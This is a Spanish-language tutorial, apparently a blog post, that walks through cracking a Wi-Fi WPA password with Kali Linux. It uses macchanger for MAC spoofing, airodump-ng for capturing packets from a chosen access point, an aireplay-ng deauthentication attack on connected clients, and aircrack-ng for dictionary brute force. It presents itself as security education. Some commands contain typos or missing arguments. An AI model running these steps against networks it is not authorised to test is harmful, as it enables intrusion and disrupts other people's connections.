El motivo de este post es compartir información de una técnica básica de hacking para todo aquel que este incursionado en seguridad informática. Cabe destacar que el post no tiene la finalidad de incentivar el cyber crimen pero si la de compartir conocimiento y educar en seguridad informática, para saber como son ejecutados y conocer la vulnerabilidad de nuestra red. Un consejo básico es elegir calves mas complejas que incluyan como mínimo mayúsculas, minúsculas y números y encapsulación WPA2. Este pentesting usaremos las herramientas aircrack y airdump sobre la distribución de linux llamada Kali, la cual ofrece una gran variedad de herramientas de auditoría de seguridad.
Configuraremos nuestra conexión wireless en modo monitor, escanearemos los puntos de acceso wifi cercanos, seleccionaremos un objetivo, empezaremos a capturar paquetes con airodump, seguido haremos un ataque de desautenticación y luego sobre el archivo de los paquetes capturados ultilizaremos un diccionario y fuerza bruta para encontrar la contraseña wifi.
Los ataques por fuerza bruta no son ataque %100 eficaces ya que dependemos de uno o varios diccionarios, poder de procesamiento, se requiere mucho tiempo y paciencia, ya que el pc durante varias horas probara infinidad de combinaciones posibles. Existe una gran posibilidad que no exista en nuestros diccionarios una combinación igual a la clave a descifrar.
Documentación adicional
https://www.aircrack-ng.org/
https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng
Configuramos nuestra conexión wireless
Indentificar la placa wireless
ificonfig
Apagamos nuestra placa wifi
ifconfig wlan0 down
Cambiamos nuestra mac address
macchanger -r wlan0
Activamos modo monitor en nuestra placa wireless
iwconfig wlan0 mode monitor
Levantamos nuestra placa wireless
ifconfig wlan0 up
PenTesting
Ahora usaremos la herramienta Airdump y scaneamos las redes wifi en nuestro entorno
airodump-ng wlan0
En un nuevo terminal vamos a puntar nuestro ataque a un punto de acceso elegido para hacer nuestro pentesting
airodump-ng -c 7 -w ssidwifi –bssid mac-wifi-a-testear wlan0
Significado de los flags:
-c es el canal del punto de acceso al cual vamos a realizar el pentesting
-w es el nombre del archivo donde se va a guardar los paquetes capturados
–bssid mac addess del punto de acceso a realizar el pentesting
Realizamos un ataque de desautenticación a los dipositivos que se encuentran conectados al punto de acceso wifi al cual estamos haciendo el pentesting.
Usaremos la herramienta aireplay
-a mac address del router del access point (BSSID)
-c mac address del cliente conectado al punto de acceso
aireplay-ng –deauth 10 -a macrouter -c maccliente
Ahora usaremos la herramienta aircrack, este por un sistema de fuerza bruta descifraza la contraseña que esta en el archivo que definimos en la etapa de captura de paquetes
-w ruta de nuestro wordlist
aircrack-ng -w /worlist/route /route/file.cap